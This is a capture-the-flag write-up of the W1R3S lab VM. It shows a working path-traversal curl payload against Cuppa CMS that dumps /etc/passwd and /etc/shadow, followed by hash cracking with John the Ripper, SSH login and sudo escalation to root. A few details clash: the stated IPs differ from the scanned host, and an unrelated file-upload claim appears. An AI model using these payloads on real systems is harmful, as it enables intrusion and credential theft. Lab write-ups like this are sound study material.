## Version 1.4.1
## language: en

Feature:
  TOE:
    w1r3s
  Category:
    Local File Injection
  Location:
    http://192.168.0.9:80/
  CWE:
    CWE-22: Improper Limitation of a Pathname to a Restricted
    Directory ('Path Traversal')
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Restrict root permissions

  Background:
  Hacker Software:
    | <Software name>   |    <Version>      |
    | Kali Linux        |      2020.3       |
    | Nmap              |      7.80         |
    | VirtualBox        |      6.1          |
    | Firefox           |      79.0         |
    | John the Ripper   |   1.9.0-jumbo-1   |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-30 11:46 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.0053s latency).
    Nmap scan report for 192.168.0.3 (192.168.0.3)
    Host is up (0.029s latency).
    Nmap scan report for w1r3s (192.168.0.9)
    Host is up (0.00061s latency).
    Nmap scan report for kali (192.168.0.11)
    Host is up (0.00086s latency).
    Nmap done: 256 IP addresses (4 hosts up) scanned in 9.56 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.14
    """
    $ sudo nmap -sV -sS 192.168.0.9
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-30 11:48 EST
    Nmap scan report for w1r3s (192.168.0.9)
    Host is up (0.00062s latency).
    Not shown: 966 filtered ports, 30 closed ports
    PORT     STATE SERVICE VERSION
    21/tcp   open  ftp     vsftpd 2.0.8 or later
    22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
    80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
    3306/tcp open  mysql   MySQL (unauthorized)
    MAC Address: 08:00:27:E1:3D:7E (Oracle VirtualBox virtual NIC)
    Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 23.59 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.9:80/
    And the Rashomon IPS homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the website does not show any vulnerabilities with the naked eye
    Then I proceeded to parse with dirb the directories on the server
    """
    $ dirb http://192.168.0.16:80/ /usr/share/wordlists/dirb/big.txt

    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Wed Dec 30 11:52:11 2020
    URL_BASE: http://192.168.0.9/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.0.9/ ----
    ==> DIRECTORY: http://192.168.0.9/administrator/
    + http://192.168.0.9/index.html (CODE:200|SIZE:11321)
    ==> DIRECTORY: http://192.168.0.9/javascript/
    + http://192.168.0.9/server-status (CODE:403|SIZE:299)
    ==> DIRECTORY: http://192.168.0.9/wordpress/

    ---- Entering directory: http://192.168.0.9/administrator/ ----
    ==> DIRECTORY: http://192.168.0.9/administrator/alerts/
    ==> DIRECTORY: http://192.168.0.9/administrator/api/
    ==> DIRECTORY: http://192.168.0.9/administrator/classes/
    ==> DIRECTORY: http://192.168.0.9/administrator/components/
    ==> DIRECTORY: http://192.168.0.9/administrator/extensions/
    + http://192.168.0.9/administrator/index.php (CODE:302|SIZE:6943)
    ==> DIRECTORY: http://192.168.0.9/administrator/installation/
    ==> DIRECTORY: http://192.168.0.9/administrator/js/
    ==> DIRECTORY: http://192.168.0.9/administrator/language/
    ==> DIRECTORY: http://192.168.0.9/administrator/media/
    + http://192.168.0.9/administrator/robots.txt (CODE:200|SIZE:26)
    ==> DIRECTORY: http://192.168.0.9/administrator/templates/
    -----------------
    END_TIME: Wed Dec 30 11:54:47 2020
    DOWNLOADED: 106076 - FOUND: 28
    """
    When I access the path "/administrator/installation/" [evidences](03.png)
    Then I looking for an exploit for Cuppa CMS [evidences](04.png)
    And I send the exploit url using curl
    """
    curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd
    http://192.168.0.9/administrator/alerts/alertConfigField.php

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/
    nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:
    /bin/false
    systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:
    /bin/false
    systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:
    /bin/false
    """
    Then you can be vulnerable by unrestricted file upload

  Scenario: Exploitation
    Given the site is vulnerable to LFI
    Then I list the passwords of the users contained in the /etc/shadow path
    """
    curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow
    http://192.168.0.9/administrator/alerts/alertConfigField.php

    root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.
    Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::

    daemon:*:17379:0:99999:7:::
    bin:*:17379:0:99999:7:::
    sys:*:17379:0:99999:7:::
    sync:*:17379:0:99999:7:::
    games:*:17379:0:99999:7:::
    man:*:17379:0:99999:7:::
    lp:*:17379:0:99999:7:::
    mail:*:17379:0:99999:7:::
    news:*:17379:0:99999:7:::
    uucp:*:17379:0:99999:7:::
    proxy:*:17379:0:99999:7:::
    www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8
    /0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:
    17560:0:99999:7:::

    backup:*:17379:0:99999:7:::
    list:*:17379:0:99999:7:::
    irc:*:17379:0:99999:7:::
    gnats:*:17379:0:99999:7:::
    nobody:*:17379:0:99999:7:::
    systemd-timesync:*:17379:0:99999:7:::
    systemd-network:*:17379:0:99999:7:::
    systemd-resolve:*:17379:0:99999:7:::
    systemd-bus-proxy:*:17379:0:99999:7:::
    syslog:*:17379:0:99999:7:::
    _apt:*:17379:0:99999:7:::
    messagebus:*:17379:0:99999:7:::
    uuidd:*:17379:0:99999:7:::
    lightdm:*:17379:0:99999:7:::
    whoopsie:*:17379:0:99999:7:::
    avahi-autoipd:*:17379:0:99999:7:::
    avahi:*:17379:0:99999:7:::
    dnsmasq:*:17379:0:99999:7:::
    colord:*:17379:0:99999:7:::
    speech-dispatcher:!:17379:0:99999:7:::
    hplip:*:17379:0:99999:7:::
    kernoops:*:17379:0:99999:7:::
    pulse:*:17379:0:99999:7:::
    rtkit:*:17379:0:99999:7:::
    saned:*:17379:0:99999:7:::
    usbmux:*:17379:0:99999:7:::
    w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4
    f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:
    17567:0:99999:7:::
    sshd:*:17554:0:99999:7:::
    ftp:*:17554:0:99999:7:::
    mysql:!:17554:0:99999:7:::
    """
    Given the password hash for user w1r3s, I copy the hash to a .txt file
    Then I use the John Ripper tool to crack the password
    """
    root@kali:/home/kali/Downloads# john pass.txt
    Using default input encoding: UTF-8
    Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
    Cost 1 (iteration count) is 5000 for all loaded hashes
    Will run 2 OpenMP threads
    Proceeding with single, rules:Single
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Warning: Only 5 candidates buffered for the current salt, minimum 8 needed
    for performance.
    Warning: Only 2 candidates buffered for the current salt, minimum 8 needed
    for performance.
    Warning: Only 1 candidate buffered for the current salt, minimum 8 needed
    for performance.
    Warning: Only 5 candidates buffered for the current salt, minimum 8 needed
    for performance.
    Almost done: Processing the remaining buffered candidate passwords, if any.
    Warning: Only 6 candidates buffered for the current salt, minimum 8 needed
    for performance.
    Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
    computer         (w1r3s)
    1g 0:00:00:01 DONE 2/3 (2020-12-30 15:05) 0.5747g/s 1828p/s 1828c/s 1828C/s
    123456..franklin
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    """
    When finished, the possible password for user w1r3s is displayed "computer"
    Then login to the server using SSH
    """
    kali@kali:~$ ssh w1r3s@192.168.0.9
    The authenticity of host '192.168.0.9 (192.168.0.9)' can't be established.
    ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.0.9' (ECDSA) to the list of known hosts
    ----------------------
    Think this is the way?
    ----------------------
    Well,........possibly.
    ----------------------
    w1r3s@192.168.0.9's password:
    Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

    625 packages can be updated.
    476 updates are security updates.

    New release '18.04.5 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.

    .....You made it huh?....
    Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
    w1r3s@W1R3S:~$
    """
    Then the permissions for the user are validated
    And privileges are escalated
    """
    w1r3s@W1R3S:~$ id
    uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),
    27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

    w1r3s@W1R3S:~$ sudo -i
    [sudo] password for w1r3s:
    root@W1R3S:~# ls
    flag.txt
    root@W1R3S:~# cat flag.txt
    root@W1R3S:~# id
    uid=0(root) gid=0(root) groups=0(root)
    """
    Given the new privileges
    Then the flag is read [evidences](05.png)

  Scenario: Remediation
    Given the Local File Injection
    Then avoid root permissions to unnecessary files

  Scenario: Scoring
   Severity scoring according to CVSSv3 standard
   Base: Attributes that are constants over time and organizations
     10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   Temporal: Attributes that measure the exploit's popularity and fixability
     7/10 (high) - E:H/RL:O/RC:C
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-12-30
